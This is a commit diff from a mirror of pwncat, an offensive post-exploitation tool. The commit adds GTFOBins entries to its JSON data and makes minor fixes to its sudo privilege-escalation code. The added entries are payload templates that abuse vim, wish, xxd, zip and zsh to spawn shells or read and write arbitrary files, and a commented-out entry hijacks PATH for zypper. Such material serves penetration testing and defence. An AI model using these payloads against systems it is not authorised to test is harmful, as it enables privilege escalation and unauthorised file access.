Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 10:54:14 +01:00
Code Projects Releases Wiki Activity

Added new GTFObins

Browse Source
This commit is contained in:
John Hammond 2020-05-23 03:06:19 -04:00
parent 76f83ea076
commit 72b83c88b2
6 changed files with 119 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
data/gtfobins.json
View File

@ -874,8 +874,52 @@
//-------------------------------------------------------------------
"vim": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [
{
"type": "shell",
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp}); echo 'exec {shell} <@stdin >@stdout 2>@stderr; exit' > $TF; {command}",
"args": ["$TF"]
}
],
//-------------------------------------------------------------------
"xargs": [
{
@ -890,5 +934,56 @@
"payload": "{command}",
"args": ["-a", "{lfile}", "-0"]
}
],
//-------------------------------------------------------------------
"xxd": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {command} -r ",
"args": []
},
// This has the same issue of not sending the right length of the file.
{
"type": "write",
"stream": "raw",
"payload": "{xxd} -l {length} | {command}",
"args": ["-r", "-", "{lfile}"]
}
],
//-------------------------------------------------------------------
// `yum` should be added.
// https://gtfobins.github.io/gtfobins/yum/
//-------------------------------------------------------------------
"zip": [
{
"type": "shell",
"payload": "TF=none; {command} --help >/dev/null; TF=$({mktemp} -u); {command} $TF /etc/hosts -T -TT '{shell} #'",
"args": []
}
],
//-------------------------------------------------------------------
"zsh": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"{shell} -p\""]
}
]
//-------------------------------------------------------------------
// zsoelim was not yet tested because it might do strange things to the data
// https://gtfobins.github.io/gtfobins/zsoelim/
//
//-------------------------------------------------------------------
// zypper requires the modification of an environment variable.
// We don't handle this well in pwncat for sudo.
// https://gtfobins.github.io/gtfobins/zypper/
// "zypper": [
// {
// "type": "shell",
// "payload": "TF=none; {command} 2>/dev/null; TF=$({mktemp} -d); cp {shell} $TF/zypper-x; export PATH=$TF:$PATH; {command} x",
// "args": [],
// "exit": "exit\n"
// }
// ]
}

6
pwncat/__main__.py
View File

@ -6,6 +6,12 @@ import socket
import sys
from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat
from pwncat.remote import Victim

4
pwncat/file.py
View File

@ -54,6 +54,7 @@ class RemoteBinaryPipe(RawIOBase):
# output of the user's terminal
def close(self):
if self.eof:
return
@ -128,13 +129,16 @@ class RemoteBinaryPipe(RawIOBase):
pass
def write(self, data: bytes):
if self.eof:
return None
try:
n = self.pty.client.send(data)
except (socket.timeout, BlockingIOError):
n = 0
if n == 0:
return None
self.count += n
return n

5
pwncat/privesc/__init__.py
View File

@ -3,7 +3,7 @@ from typing import Type, List, Tuple, Optional
from prompt_toolkit.shortcuts import confirm
from colorama import Fore
import crypt
from time import sleep
import time
import socket
from pprint import pprint
import re
@ -278,9 +278,10 @@ class Finder:
try:
# Attempt our basic, known technique
exit_script = technique.method.execute(technique)
pwncat.victim.flush_output()
pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable
time.sleep(0.1)
pwncat.victim.reset()
# Check that we actually succeeded

13
pwncat/privesc/sudo.py
View File

@ -2,7 +2,7 @@
from typing import Generator, List, BinaryIO
import shlex
import sys
from time import sleep
import time
import os
from colorama import Fore, Style
import socket
@ -254,6 +254,8 @@ class SudoMethod(Method):
method, sudo_spec, need_password = technique.ident
# Build the payload
# The data size is WRONG for encoded payloads!!!
# ... but I guess this not applicable for `raw` streams..?
payload, input_data, exit_command = method.build(
lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data)
)
@ -270,12 +272,11 @@ class SudoMethod(Method):
exit_cmd=exit_command.encode("utf-8"),
)
# Send the input data required to initiate the transfer
if len(input_data) > 0:
pipe.write(input_data.encode("utf-8"))
with method.wrap_stream(pipe) as pipe:
# Send the input data required to initiate the transfer
if len(input_data) > 0:
pipe.write(input_data.encode("utf-8"))
pipe.write(data)
def get_name(self, tech: Technique):

2
pwncat/remote/victim.py
View File

@ -1328,6 +1328,8 @@ class Victim:
output = b""
old_timeout = self.client.gettimeout()
self.client.settimeout(0)
# self.client.send(b"echo\n")
# some = True
while True:
try: